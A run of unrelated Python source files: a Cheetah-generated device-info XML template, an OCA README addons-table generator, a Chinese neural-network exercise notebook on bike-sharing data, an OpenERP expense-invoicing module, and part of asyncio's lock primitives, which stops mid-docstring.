_v is not None: write(_filter(_v, rawExpr=u'$model')) # from line 8, col 16. write(u'''</e2devicename> \t<e2frontends> ''') for tuner in VFFSL(SL,"tuners",True): # generated from line 10, col 3 write(u'''\t\t<e2frontend> \t\t\t<e2name>''') _v = VFFSL(SL,"tuner.name",True) # u'$tuner.name' on line 12, col 12 if _v is not None: write(_filter(_v, rawExpr=u'$tuner.name')) # from line 12, col 12. write(u'''</e2name> \t\t\t<e2model>''') _v = VFFSL(SL,"tuner.type",True) # u'$tuner.type' on line 13, col 13 if _v is not None: write(_filter(_v, rawExpr=u'$tuner.type')) # from line 13, col 13. write(u'''</e2model> \t\t</e2frontend> ''') write(u'''\t</e2frontends> \t<e2network> ''') for iface in VFFSL(SL,"ifaces",True): # generated from line 18, col 3 write(u'''\t\t<e2interface> \t\t\t<e2name>''') _v = VFFSL(SL,"iface.name",True) # u'$iface.name' on line 20, col 12 if _v is not None: write(_filter(_v, rawExpr=u'$iface.name')) # from line 20, col 12. write(u'''</e2name> \t\t\t<e2mac>''') _v = VFFSL(SL,"iface.mac",True) # u'$iface.mac' on line 21, col 11 if _v is not None: write(_filter(_v, rawExpr=u'$iface.mac')) # from line 21, col 11. write(u'''</e2mac> \t\t\t<e2dhcp>''') _v = VFFSL(SL,"iface.dhcp",True) # u'$iface.dhcp' on line 22, col 12 if _v is not None: write(_filter(_v, rawExpr=u'$iface.dhcp')) # from line 22, col 12. write(u'''</e2dhcp> \t\t\t<e2ip>''') _v = VFFSL(SL,"iface.ip",True) # u'$iface.ip' on line 23, col 10 if _v is not None: write(_filter(_v, rawExpr=u'$iface.ip')) # from line 23, col 10. write(u'''</e2ip> \t\t\t<e2gateway>''') _v = VFFSL(SL,"iface.gw",True) # u'$iface.gw' on line 24, col 15 if _v is not None: write(_filter(_v, rawExpr=u'$iface.gw')) # from line 24, col 15. write(u'''</e2gateway> \t\t\t<e2netmask>''') _v = VFFSL(SL,"iface.mask",True) # u'$iface.mask' on line 25, col 15 if _v is not None: write(_filter(_v, rawExpr=u'$iface.mask')) # from line 25, col 15. write(u'''</e2netmask> \t\t</e2interface> ''') write(u'''\t</e2network> \t<e2hdds> ''') for hd in VFFSL(SL,"hdd",True): # generated from line 30, col 3 write(u'''\t\t<e2hdd> \t\t\t<e2model>''') _v = VFFSL(SL,"hd.model",True) # u'$hd.model' on line 32, col 13 if _v is not None: write(_filter(_v, rawExpr=u'$hd.model')) # from line 32, col 13. write(u'''</e2model> \t\t\t<e2capacity>''') _v = VFFSL(SL,"hd.capacity",True) # u'$hd.capacity' on line 33, col 16 if _v is not None: write(_filter(_v, rawExpr=u'$hd.capacity')) # from line 33, col 16. write(u'''</e2capacity> \t\t\t<e2free>''') _v = VFFSL(SL,"hd.free",True) # u'$hd.free' on line 34, col 12 if _v is not None: write(_filter(_v, rawExpr=u'$hd.free')) # from line 34, col 12. write(u'''</e2free> \t\t</e2hdd> ''') write(u'''\t</e2hdds> </e2deviceinfo> ''') _filter = self._CHEETAH__currentFilter = _orig_filter_63410281 ######################################## ## END - generated method body return _dummyTrans and trans.response().getvalue() or "" ################################################## ## CHEETAH GENERATED ATTRIBUTES _CHEETAH__instanceInitialized = False _CHEETAH_version = __CHEETAH_version__ _CHEETAH_versionTuple = __CHEETAH_versionTuple__ _CHEETAH_genTime = __CHEETAH_genTime__ _CHEETAH_genTimestamp = __CHEETAH_genTimestamp__ _CHEETAH_src = __CHEETAH_src__ _CHEETAH_srcLastModified = __CHEETAH_srcLastModified__ _mainCheetahMethod_for_deviceinfo= 'respond' ## END CLASS DEFINITION if not hasattr(deviceinfo, '_initCheetahAttributes'): templateAPIClass = getattr(deviceinfo, '_CHEETAH_templateClass', Template) templateAPIClass._addCheetahPlumbingCodeToClass(deviceinfo) # CHEETAH was developed by Tavis Rudd and Mike Orr # with code, advice and input from many other volunteers. # For more information visit http://www.CheetahTemplate.org/ ################################################## ## if run from command line: if __name__ == '__main__': from Cheetah.TemplateCmdLineIface import CmdLineIface CmdLineIface(templateObj=deviceinfo()).run()
#!/usr/bin/env python # -*- coding: utf-8 -*- # License AGPLv3 (http://www.gnu.org/licenses/agpl-3.0-standalone.html) """ This script replaces markers in the README.md files of an OCA repository with the list of addons present in the repository. It preserves the marker so it can be run again. The script must be run from the root of the repository, where the README.md file can be found. Markers in README.md must have the form: [//]: # (addons) does not matter, will be replaced by the script [//]: # (end addons) """ from __future__ import print_function import ast import io import logging import os import re import click from .gitutils import commit_if_needed _logger = logging.getLogger(__name__) MARKERS = r'(\[//\]: # \(addons\))|(\[//\]: # \(end addons\))' MANIFESTS = ('__openerp__.py', '__manifest__.py') def sanitize_cell(s): if not s: return '' s = ' '.join(s.split()) return s def render_markdown_table(header, rows): table = [] rows = [header, ['---'] * len(header)] + rows for row in rows: table.append(' | '.join(row)) return '\n'.join(table) def replace_in_readme(readme_path, header, rows_available, rows_unported): with io.open(readme_path, encoding='utf8') as f: readme = f.read() parts = re.split(MARKERS, readme, flags=re.MULTILINE) if len(parts) != 7: _logger.warning('Addons markers not found or incorrect in %s', readme_path) return addons = [] if rows_available: addons.extend([ '\n', '\n', 'Available addons\n', '----------------\n', render_markdown_table(header, rows_available), '\n' ]) if rows_unported: addons.extend([ '\n', '\n', 'Unported addons\n', '---------------\n', render_markdown_table(header, rows_unported), '\n' ]) addons.append('\n') parts[2:5] = addons readme = ''.join(parts) with io.open(readme_path, 'w', encoding='utf8') as f: f.write(readme) @click.command() @click.option('--commit/--no-commit', help="git commit changes to README.rst, if any.") def gen_addons_table(commit): readme_path = 'README.md' if not os.path.isfile(readme_path): _logger.warning('%s not found', readme_path) return # list addons in . and __unported__ addon_paths = [] # list of (addon_path, unported) for addon_path in os.listdir('.'): addon_paths.append((addon_path, False)) unported_directory = '__unported__' if os.path.isdir(unported_directory): for addon_path in os.listdir(unported_directory): addon_path = os.path.join(unported_directory, addon_path) addon_paths.append((addon_path, True)) addon_paths = sorted(addon_paths, key=lambda x: x[0]) # load manifests header = ('addon', 'version', 'summary') rows_available = [] rows_unported = [] for addon_path, unported in addon_paths: for manifest_file in MANIFESTS: manifest_path = os.path.join(addon_path, manifest_file) has_manifest = os.path.isfile(manifest_path) if has_manifest: break if has_manifest: with open(manifest_path) as f: manifest = ast.literal_eval(f.read()) addon_name = os.path.basename(addon_path) link = '[%s](%s/)' % (addon_name, addon_path) version = manifest.get('version') or '' summary = manifest.get('summary') or manifest.get('name') summary = sanitize_cell(summary) installable = manifest.get('installable', True) if unported and installable: _logger.warning('%s is in __unported__ but is marked ' 'installable.' % addon_path) installable = False if installable: rows_available.append((link, version, summary)) else: rows_unported.append((link, version + ' (unported)', summary)) # replace table in README.md replace_in_readme(readme_path, header, rows_available, rows_unported) if commit: commit_if_needed( [readme_path], '[UPD] addons table in README.md', ) if __name__ == '__main__': gen_addons_table()
# coding: utf-8 # # 你的第一个神经网络 # # 在此项目中,你将构建你的第一个神经网络,并用该网络预测每日自行车租客人数。我们提供了一些代码,但是需要你来实现神经网络(大部分内容)。提交此项目后,欢迎进一步探索该数据和模型。 # In[1]: get_ipython().magic('matplotlib inline') get_ipython().magic("config InlineBackend.figure_format = 'retina'") import numpy as np import pandas as pd import matplotlib.pyplot as plt # ## 加载和准备数据 # # 构建神经网络的关键一步是正确地准备数据。不同尺度级别的变量使网络难以高效地掌握正确的权重。我们在下方已经提供了加载和准备数据的代码。你很快将进一步学习这些代码! # In[3]: data_path = 'Bike-Sharing-Dataset/hour.csv' rides = pd.read_csv(data_path) # In[4]: rides.head() # ## 数据简介 # # 此数据集包含的是从 2011 年 1 月 1 日到 2012 年 12 月 31 日期间每天每小时的骑车人数。骑车用户分成临时用户和注册用户,cnt 列是骑车用户数汇总列。你可以在上方看到前几行数据。 # # 下图展示的是数据集中前 10 天左右的骑车人数(某些天不一定是 24 个条目,所以不是精确的 10 天)。你可以在这里看到每小时租金。这些数据很复杂!周末的骑行人数少些,工作日上下班期间是骑行高峰期。我们还可以从上方的数据中看到温度、湿度和风速信息,所有这些信息都会影响骑行人数。你需要用你的模型展示所有这些数据。 # In[5]: rides[:24*10].plot(x='dteday', y='cnt') # ### 虚拟变量(哑变量) # # 下面是一些分类变量,例如季节、天气、月份。要在我们的模型中包含这些数据,我们需要创建二进制虚拟变量。用 Pandas 库中的 `get_dummies()` 就可以轻松实现。 # In[6]: dummy_fields = ['season', 'weathersit', 'mnth', 'hr', 'weekday'] for each in dummy_fields: dummies = pd.get_dummies(rides[each], prefix=each, drop_first=False) rides = pd.concat([rides, dummies], axis=1) fields_to_drop = ['instant', 'dteday', 'season', 'weathersit', 'weekday', 'atemp', 'mnth', 'workingday', 'hr'] data = rides.drop(fields_to_drop, axis=1) data.head() # ### 调整目标变量 # # 为了更轻松地训练网络,我们将对每个连续变量标准化,即转换和调整变量,使它们的均值为 0,标准差为 1。 # # 我们会保存换算因子,以便当我们使用网络进行预测时可以还原数据。 # In[7]: quant_features = ['casual', 'registered', 'cnt', 'temp', 'hum', 'windspeed'] # Store scalings in a dictionary so we can convert back later scaled_features = {} for each in quant_features: mean, std = data[each].mean(), data[each].std() scaled_features[each] = [mean, std] data.loc[:, each] = (data[each] - mean)/std # ### 将数据拆分为训练、测试和验证数据集 # # 我们将大约最后 21 天的数据保存为测试数据集,这些数据集会在训练完网络后使用。我们将使用该数据集进行预测,并与实际的骑行人数进行对比。 # In[8]: # Save data for approximately the last 21 days test_data = data[-21*24:] # Now remove the test data from the data set data = data[:-21*24] # Separate the data into features and targets target_fields = ['cnt', 'casual', 'registered'] features, targets = data.drop(target_fields, axis=1), data[target_fields] test_features, test_targets = test_data.drop(target_fields, axis=1), test_data[target_fields] # 我们将数据拆分为两个数据集,一个用作训练,一个在网络训练完后用来验证网络。因为数据是有时间序列特性的,所以我们用历史数据进行训练,然后尝试预测未来数据(验证数据集)。 # In[9]: # Hold out the last 60 days or so of the remaining data as a validation set train_features, train_targets = features[:-60*24], targets[:-60*24] val_features, val_targets = features[-60*24:], targets[-60*24:] # ## 开始构建网络 # # 下面你将构建自己的网络。我们已经构建好结构和反向传递部分。你将实现网络的前向传递部分。还需要设置超参数:学习速率、隐藏单元的数量,以及训练传递数量。 # # <img src="assets/neural_network.png" width=300px> # # 该网络有两个层级,一个隐藏层和一个输出层。隐藏层级将使用 S 型函数作为激活函数。输出层只有一个节点,用于递归,节点的输出和节点的输入相同。即激活函数是 $f(x)=x$。这种函数获得输入信号,并生成输出信号,但是会考虑阈值,称为激活函数。我们完成网络的每个层级,并计算每个神经元的输出。一个层级的所有输出变成下一层级神经元的输入。这一流程叫做前向传播(forward propagation)。 # # 我们在神经网络中使用权重将信号从输入层传播到输出层。我们还使用权重将错误从输出层传播回网络,以便更新权重。这叫做反向传播(backpropagation)。 # # > **提示**:你需要为反向传播实现计算输出激活函数 ($f(x) = x$) 的导数。如果你不熟悉微积分,其实该函数就等同于等式 $y = x$。该等式的斜率是多少?也就是导数 $f(x)$。 # # # 你需要完成以下任务: # # 1. 实现 S 型激活函数。将 `__init__` 中的 `self.activation_function` 设为你的 S 型函数。 # 2. 在 `train` 方法中实现前向传递。 # 3. 在 `train` 方法中实现反向传播算法,包括计算输出错误。 # 4. 在 `run` 方法中实现前向传递。 # # # In[26]: class NeuralNetwork(object): def __init__(self, input_nodes, hidden_nodes, output_nodes, learning_rate): # Set number of nodes in input, hidden and output layers. self.input_nodes = input_nodes self.hidden_nodes = hidden_nodes self.output_nodes = output_nodes # Initialize weights self.weights_input_to_hidden = np.random.normal(0.0, self.input_nodes**-0.5, (self.input_nodes, self.hidden_nodes)) self.weights_hidden_to_output = np.random.normal(0.0, self.hidden_nodes**-0.5, (self.hidden_nodes, self.output_nodes)) self.lr = learning_rate #### TODO: Set self.activation_function to your implemented sigmoid function #### # # Note: in Python, you can define a function with a lambda expression, # as shown below. self.activation_function = lambda x : 1 / (1 + np.exp(-x)) # Replace 0 with your sigmoid calculation. self.sigmoid_prime = lambda fx : fx * (1 - fx) ### If the lambda code above is not something you're familiar with, # You can uncomment out the following three lines and put your # implementation there instead. # #def sigmoid(x): # return 0 # Replace 0 with your sigmoid calculation here #self.activation_function = sigmoid def train(self, features, targets): ''' Train the network on batch of features and targets. Arguments --------- features: 2D array, each row is one data record, each column is a feature targets: 1D array of target values ''' n_records = features.shape[0] delta_weights_i_h = np.zeros(self.weights_input_to_hidden.shape) delta_weights_h_o = np.zeros(self.weights_hidden_to_output.shape) for X, y in zip(features, targets): #### Implement the forward pass here #### ### Forward pass ### # TODO: Hidden layer - Replace these values with your calculations. hidden_inputs = np.dot(X, self.weights_input_to_hidden) # signals into hidden layer hidden_outputs = self.activation_function(hidden_inputs) # signals from hidden layer # TODO: Output layer - Replace these values with your calculations. final_inputs = np.dot(hidden_outputs, self.weights_hidden_to_output) # signals into final output layer final_outputs = final_inputs # signals from final output layer #### Implement the backward pass here #### ### Backward pass ### # TODO: Output error - Replace this value with your calculations. error = y - final_outputs # Output layer error is the difference between desired target and actual output. output_error_term = error * 1 # TODO: Calculate the hidden layer's contribution to the error hidden_error = output_error_term * self.weights_hidden_to_output.T # TODO: Backpropagated error terms - Replace these values with your calculations. hidden_error_term = hidden_error * self.sigmoid_prime(hidden_outputs) # Weight step (input to hidden) delta_weights_i_h += hidden_error_term * X[:, None] # Weight step (hidden to output) delta_weights_h_o += output_error_term * hidden_outputs[:, None] # TODO: Update the weights - Replace these values with your calculations. self.weights_hidden_to_output += self.lr * delta_weights_h_o / n_records # update hidden-to-output weights with gradient descent step self.weights_input_to_hidden += self.lr * delta_weights_i_h / n_records # update input-to-hidden weights with gradient descent step def run(self, features): ''' Run a forward pass through the network with input features Arguments --------- features: 1D array of feature values ''' #### Implement the forward pass here #### # TODO: Hidden layer - replace these values with the appropriate calculations. hidden_inputs = np.dot(features, self.weights_input_to_hidden) # signals into hidden layer hidden_outputs = self.activation_function(hidden_inputs) # signals from hidden layer # TODO: Output layer - Replace these values with the appropriate calculations. final_inputs = np.dot(hidden_outputs, self.weights_hidden_to_output) # signals into final output layer final_outputs = final_inputs # signals from final output layer return final_outputs # In[28]: def MSE(y, Y): return np.mean((y-Y)**2) # ## 单元测试 # # 运行这些单元测试,检查你的网络实现是否正确。这样可以帮助你确保网络已正确实现,然后再开始训练网络。这些测试必须成功才能通过此项目。 # In[31]: import unittest inputs = np.array([[0.5, -0.2, 0.1]]) targets = np.array([[0.4]]) test_w_i_h = np.array([[0.1, -0.2], [0.4, 0.5], [-0.3, 0.2]]) test_w_h_o = np.array([[0.3], [-0.1]]) class TestMethods(unittest.TestCase): ########## # Unit tests for data loading ########## def test_data_path(self): # Test that file path to dataset has been unaltered self.assertTrue(data_path.lower() == 'bike-sharing-dataset/hour.csv') def test_data_loaded(self): # Test that data frame loaded self.assertTrue(isinstance(rides, pd.DataFrame)) ########## # Unit tests for network functionality ########## def test_activation(self): network = NeuralNetwork(3, 2, 1, 0.5) # Test that the activation function is a sigmoid self.assertTrue(np.all(network.activation_function(0.5) == 1/(1+np.exp(-0.5)))) def test_train(self): # Test that weights are updated correctly on training network = NeuralNetwork(3, 2, 1, 0.5) network.weights_input_to_hidden = test_w_i_h.copy() network.weights_hidden_to_output = test_w_h_o.copy() network.train(inputs, targets) self.assertTrue(np.allclose(network.weights_hidden_to_output, np.array([[ 0.37275328], [-0.03172939]]))) self.assertTrue(np.allclose(network.weights_input_to_hidden, np.array([[ 0.10562014, -0.20185996], [0.39775194, 0.50074398], [-0.29887597, 0.19962801]]))) def test_run(self): # Test correctness of run method network = NeuralNetwork(3, 2, 1, 0.5) network.weights_input_to_hidden = test_w_i_h.copy() network.weights_hidden_to_output = test_w_h_o.copy() self.assertTrue(np.allclose(network.run(inputs), 0.09998924)) suite = unittest.TestLoader().loadTestsFromModule(TestMethods()) unittest.TextTestRunner().run(suite) # ## 训练网络 # # 现在你将设置网络的超参数。策略是设置的超参数使训练集上的错误很小但是数据不会过拟合。如果网络训练时间太长,或者有太多的隐藏节点,可能就会过于针对特定训练集,无法泛化到验证数据集。即当训练集的损失降低时,验证集的损失将开始增大。 # # 你还将采用随机梯度下降 (SGD) 方法训练网络。对于每次训练,都获取随机样本数据,而不是整个数据集。与普通梯度下降相比,训练次数要更多,但是每次时间更短。这样的话,网络训练效率更高。稍后你将详细了解 SGD。 # # # ### 选择迭代次数 # # 也就是训练网络时从训练数据中抽样的批次数量。迭代次数越多,模型就与数据越拟合。但是,如果迭代次数太多,模型就无法很好地泛化到其他数据,这叫做过拟合。你需要选择一个使训练损失很低并且验证损失保持中等水平的数字。当你开始过拟合时,你会发现训练损失继续下降,但是验证损失开始上升。 # # ### 选择学习速率 # # 速率可以调整权重更新幅度。如果速率太大,权重就会太大,导致网络无法与数据相拟合。建议从 0.1 开始。如果网络在与数据拟合时遇到问题,尝试降低学习速率。注意,学习速率越低,权重更新的步长就越小,神经网络收敛的时间就越长。 # # # ### 选择隐藏节点数量 # # 隐藏节点越多,模型的预测结果就越准确。尝试不同的隐藏节点的数量,看看对性能有何影响。你可以查看损失字典,寻找网络性能指标。如果隐藏单元的数量太少,那么模型就没有足够的空间进行学习,如果太多,则学习方向就有太多的选择。选择隐藏单元数量的技巧在于找到合适的平衡点。 # In[59]: import sys ### Set the hyperparameters here ### iterations = 4000 learning_rate = 0.3 hidden_nodes = 4 output_nodes = 1 N_i = train_features.shape[1] network = NeuralNetwork(N_i, hidden_nodes, output_nodes, learning_rate) losses = {'train':[], 'validation':[]} for ii in range(iterations): # Go through a random batch of 128 records from the training data set batch = np.random.choice(train_features.index, size=128) X, y = train_features.ix[batch].values, train_targets.ix[batch]['cnt'] network.train(X, y) # Printing out the training progress train_loss = MSE(network.run(train_features).T, train_targets['cnt'].values) val_loss = MSE(network.run(val_features).T, val_targets['cnt'].values) sys.stdout.write("\rProgress: {:2.1f}".format(100 * ii/float(iterations)) + "% ... Training loss: " + str(train_loss)[:5] + " ... Validation loss: " + str(val_loss)[:5]) sys.stdout.flush() losses['train'].append(train_loss) losses['validation'].append(val_loss) # In[60]: plt.plot(losses['train'], label='Training loss') plt.plot(losses['validation'], label='Validation loss') plt.legend() _ = plt.ylim() # ## 检查预测结果 # # 使用测试数据看看网络对数据建模的效果如何。如果完全错了,请确保网络中的每步都正确实现。 # In[61]: fig, ax = plt.subplots(figsize=(8,4)) mean, std = scaled_features['cnt'] predictions = network.run(test_features).T*std + mean ax.plot(predictions[0], label='Prediction') ax.plot((test_targets['cnt']*std + mean).values, label='Data') ax.set_xlim(right=len(predictions)) ax.legend() dates = pd.to_datetime(rides.ix[test_data.index]['dteday']) dates = dates.apply(lambda d: d.strftime('%b %d')) ax.set_xticks(np.arange(len(dates))[12::24]) _ = ax.set_xticklabels(dates[12::24], rotation=45) # ## 可选:思考下你的结果(我们不会评估这道题的答案) # # # 请针对你的结果回答以下问题。模型对数据的预测效果如何?哪里出现问题了?为何出现问题呢? # # > **注意**:你可以通过双击该单元编辑文本。如果想要预览文本,请按 Control + Enter # # #### 请将你的答案填写在下方 #
# -*- coding: utf-8 -*- ############################################################################## # # OpenERP, Open Source Management Solution # Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>). # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU Affero General Public License as # published by the Free Software Foundation, either version 3 of the # License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Affero General Public License for more details. # # You should have received a copy of the GNU Affero General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. # ############################################################################## from openerp.osv import fields, osv from openerp.osv.orm import intersect from openerp.tools.translate import _ from openerp.addons.decimal_precision import decimal_precision as dp class account_analytic_account(osv.osv): _name = "account.analytic.account" _inherit = "account.analytic.account" def _get_total_estimation(self, account): tot_est = super(account_analytic_account, self)._get_total_estimation(account) if account.charge_expenses: tot_est += account.est_expenses return tot_est def _get_total_invoiced(self, account): total_invoiced = super(account_analytic_account, self)._get_total_invoiced(account) if account.charge_expenses: total_invoiced += account.expense_invoiced return total_invoiced def _get_total_remaining(self, account): total_remaining = super(account_analytic_account, self)._get_total_remaining(account) if account.charge_expenses: total_remaining += account.remaining_expense return total_remaining def _get_total_toinvoice(self, account): total_toinvoice = super(account_analytic_account, self)._get_total_toinvoice(account) if account.charge_expenses: total_toinvoice += account.expense_to_invoice return total_toinvoice def _remaining_expnse_calc(self, cr, uid, ids, name, arg, context=None): res = {} for account in self.browse(cr, uid, ids, context=context): if account.est_expenses != 0: res[account.id] = max(account.est_expenses - account.expense_invoiced, account.expense_to_invoice) else: res[account.id]=0.0 return res def _expense_to_invoice_calc(self, cr, uid, ids, name, arg, context=None): res = {} #We don't want consolidation for each of these fields because those complex computation is resource-greedy. for account in self.pool.get('account.analytic.account').browse(cr, uid, ids, context=context): cr.execute(""" SELECT product_id, sum(amount), user_id, to_invoice, sum(unit_amount), product_uom_id, line.name FROM account_analytic_line line LEFT JOIN account_analytic_journal journal ON (journal.id = line.journal_id) WHERE account_id = %s AND journal.type = 'purchase' AND invoice_id IS NULL AND to_invoice IS NOT NULL GROUP BY product_id, user_id, to_invoice, product_uom_id, line.name""", (account.id,)) res[account.id] = 0.0 for product_id, total_amount, user_id, factor_id, qty, uom, line_name in cr.fetchall(): #the amount to reinvoice is the real cost. We don't use the pricelist total_amount = -total_amount factor = self.pool.get('hr_timesheet_invoice.factor').browse(cr, uid, factor_id, context=context) res[account.id] += total_amount * (100 - factor.factor or 0.0) / 100.0 return res def _expense_invoiced_calc(self, cr, uid, ids, name, arg, context=None): lines_obj = self.pool.get('account.analytic.line') res = {} for account in self.browse(cr, uid, ids, context=context): res[account.id] = 0.0 line_ids = lines_obj.search(cr, uid, [('account_id','=', account.id), ('invoice_id','!=',False), ('to_invoice','!=', False), ('journal_id.type', '=', 'purchase')], context=context) #Put invoices in separate array in order not to calculate them double invoices = [] for line in lines_obj.browse(cr, uid, line_ids, context=context): if line.invoice_id not in invoices: invoices.append(line.invoice_id) for invoice in invoices: res[account.id] += invoice.amount_untaxed return res def _ca_invoiced_calc(self, cr, uid, ids, name, arg, context=None): result = super(account_analytic_account, self)._ca_invoiced_calc(cr, uid, ids, name, arg, context=context) for acc in self.browse(cr, uid, result.keys(), context=context): result[acc.id] = result[acc.id] - (acc.expense_invoiced or 0.0) return result _columns = { 'charge_expenses' : fields.boolean('Charge Expenses'), 'expense_invoiced' : fields.function(_expense_invoiced_calc, type="float"), 'expense_to_invoice' : fields.function(_expense_to_invoice_calc, type='float'), 'remaining_expense' : fields.function(_remaining_expnse_calc, type="float"), 'est_expenses': fields.float('Estimation of Expenses to Invoice'), 'ca_invoiced': fields.function(_ca_invoiced_calc, type='float', string='Invoiced Amount', help="Total customer invoiced amount for this account.", digits_compute=dp.get_precision('Account')), } def on_change_template(self, cr, uid, id, template_id, context=None): res = super(account_analytic_account, self).on_change_template(cr, uid, id, template_id, context=context) if template_id and 'value' in res: template = self.browse(cr, uid, template_id, context=context) res['value']['charge_expenses'] = template.charge_expenses res['value']['est_expenses'] = template.est_expenses return res def open_hr_expense(self, cr, uid, ids, context=None): mod_obj = self.pool.get('ir.model.data') act_obj = self.pool.get('ir.actions.act_window') dummy, act_window_id = mod_obj.get_object_reference(cr, uid, 'hr_expense', 'expense_all') result = act_obj.read(cr, uid, act_window_id, context=context) line_ids = self.pool.get('hr.expense.line').search(cr,uid,[('analytic_account', 'in', ids)]) result['domain'] = [('line_ids', 'in', line_ids)] names = [account.name for account in self.browse(cr, uid, ids, context=context)] result['name'] = _('Expenses of %s') % ','.join(names) result['context'] = {'analytic_account': ids[0]} result['view_type'] = 'form' return result def hr_to_invoice_expense(self, cr, uid, ids, context=None): domain = [('invoice_id','=',False),('to_invoice','!=',False), ('journal_id.type', '=', 'purchase'), ('account_id', 'in', ids)] names = [record.name for record in self.browse(cr, uid, ids, context=context)] name = _('Expenses to Invoice of %s') % ','.join(names) return { 'type': 'ir.actions.act_window', 'name': name, 'view_type': 'form', 'view_mode': 'tree,form', 'domain' : domain, 'res_model': 'account.analytic.line', 'nodestroy': True, } # vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
"""Synchronization primitives.""" __all__ = ['Lock', 'Event', 'Condition', 'Semaphore', 'BoundedSemaphore'] import collections from . import events from . import futures from .coroutines import coroutine class _ContextManager: """Context manager. This enables the following idiom for acquiring and releasing a lock around a block: with (yield from lock): <block> while failing loudly when accidentally using: with lock: <block> """ def __init__(self, lock): self._lock = lock def __enter__(self): # We have no use for the "as ..." clause in the with # statement for locks. return None def __exit__(self, *args): try: self._lock.release() finally: self._lock = None # Crudely prevent reuse. class Lock: """Primitive lock objects. A primitive lock is a synchronization primitive that is not owned by a particular coroutine when locked. A primitive lock is in one of two states, 'locked' or 'unlocked'. It is created in the unlocked state. It has two basic methods, acquire() and release(). When the state is unlocked, acquire() changes the state to locked and returns immediately. When the state is locked, acquire() blocks until a call to release() in another coroutine changes it to unlocked, then the acquire() call resets it to locked and returns. The release() method should only be called in the locked state; it changes the state to unlocked and returns immediately. If an attempt is made to release an unlocked lock, a RuntimeError will be raised. When more than one coroutine is blocked in acquire() waiting for the state to turn to unlocked, only one coroutine proceeds when a release() call resets the state to unlocked; first coroutine which is blocked in acquire() is being processed. acquire() is a coroutine and should be called with 'yield from'. Locks also support the context management protocol. '(yield from lock)' should be used as context manager expression. Usage: lock = Lock() ... yield from lock try: ... finally: lock.release() Context manager usage: lock = Lock() ... with (yield from lock): ... Lock objects can be tested for locking state: if not lock.locked(): yield from lock else: # lock is acquired ... """ def __init__(self, *, loop=None): self._waiters = collections.deque() self._locked = False if loop is not None: self._loop = loop else: self._loop = events.get_event_loop() def __repr__(self): res = super().__repr__() extra = 'locked' if self._locked else 'unlocked' if self._waiters: extra = '{},waiters:{}'.format(extra, len(self._waiters)) return '<{} [{}]>'.format(res[1:-1], extra) def locked(self): """Return True if lock is acquired.""" return self._locked @coroutine def acquire(self): """Acquire a lock. This method blocks until the lock is unlocked, then sets it to locked and returns True. """ if not self._waiters and not self._locked: self._locked = True return True fut = futures.Future(loop=self._loop) self._waiters.append(fut) try: yield from fut self._locked = True return True finally: self._waiters.remove(fut) def release(self): """Release a lock. When the lock is locked, reset it to unlocked, and return. If any other coroutines are blocked waiting for the lock to become unlocked, allow exactly one of them to proceed. When invoked on an unlocked lock, a RuntimeError is raised. There is no return value. """ if self._locked: self._locked = False # Wake up the first waiter who isn't cancelled. for fut in self._waiters: if not fut.done(): fut.set_result(True) break else: raise RuntimeError('Lock is not acquired.') def __enter__(self): raise RuntimeError( '"yield from" should be used as context manager expression') def __exit__(self, *args): # This must exist because __enter__ exists, even though that # always raises; that's how the with-statement works. pass def __iter__(self): # This is not a coroutine. It is meant to enable the idiom: # # with (yield from lock): # <block> # # as an alternative to: # # yield from lock.acquire() # try: # <block> # finally: # lock.release() yield from self.acquire() return _ContextManager(self) class Event: """Asynchronous equivalent to threading.Event. Class implementing event objects. An event manages a flag that can be set to true with the set() method and reset to false with the clear() method. The wait() method blocks until the flag is true. The flag is initially false. """ def __init__(self, *, loop=None): self._waiters = collections.deque() self._value = False if loop is not None: self._loop = loop else: self._loop = events.get_event_loop() def __repr__(self): res = super().__repr__() extra = 'set' if self._value else 'unset' if self._waiters: extra = '{},waiters:{}'.format(extra, len(self._waiters)) return '<{} [{}]>'.format(res[1:-1], extra) def is_set(self): """Return True if and only if the internal flag is true.""" return self._value def set(self): """Set the internal flag to true. All coroutines waiting for it to become true are awakened. Coroutine that call wait() once the flag is true will not block at all. """ if not self._value: self._value = True for fut in self._waiters: if not fut.done(): fut.set_result(True) def clear(self): """Reset the internal flag to false. Subsequently, coroutines calling wait() will block until set() is called to set the internal flag to true again.""" self._value = False @coroutine def wait(self): """Block until the internal flag is true. If the internal flag is true on entry, return True immediately. Otherwise, block until another coroutine calls set() to set the flag to true, then return True. """ if self._value: return True fut = futures.Future(loop=self._loop) self._waiters.append(fut) try: yield from fut return True finally: self._waiters.remove(fut) class Condition: """Asynchronous equivalent to threading.Condition. This class implements condition variable objects. A condition variable allows one or more coroutines to wait until they are notified by another coroutine. A new Lock object is created and used as the underlying lock. """ def __init__(self, lock=None, *, loop=None): if loop is not None: self._loop = loop else: self._loop = events.get_event_loop() if lock is None: lock = Lock(loop=self._loop) elif lock._loop is not self._loop: raise ValueError("loop argument must agree with lock") self._lock = lock # Export the lock's locked(), acquire() and release() methods. self.locked = lock.locked self.acquire = lock.acquire self.release = lock.release self._waiters = collections.deque() def __repr__(self): res = super().__repr__() extra = 'locked' if self.locked() else 'unlocked' if self._waiters: extra = '{},waiters:{}'.format(extra, len(self._waiters)) return '<{} [{}]>'.format(res[1:-1], extra) @coroutine def wait(self): """Wait until notified. If the calling coroutine has not acquired the lock when this method is called, a RuntimeError is raised. This method releases the underlying lock, and then blocks until it is awakened by a notify() or notify_all() call for the same condition variable in another coroutine. Once awakened, it re-acquires the lock and returns True. """ if not self.locked(): raise RuntimeError('cannot wait on un-acquired lock') self.release() try: fut = futures.Future(loop=self._loop) self._waiters.append(fut) try: yield from fut return True finally: self._waiters.remove(fut) finally: yield from self.acquire() @coroutine def wait_for(self, predicate): """Wait until a predicate becomes true. The predicate should be a callable which result will be interpreted as a boolean value. The final predicate value is the return value. """ result = predicate() while not result: yield from self.wait() result = predicate() return result def notify(self, n=1): """By default, wake up one coroutine waiting on this condition, if any. If the calling coroutine has not acquired the lock when this method is called, a RuntimeError is raised. This method wakes up at most n of the coroutines waiting for the condition variable; it is a no-op if no coroutines are waiting. Note: an awakened coroutine does not actually return from its wait() call until it can reacquire the lock. Since notify() does not release the lock, its caller should. """ if not self.locked(): raise RuntimeError('cannot notify 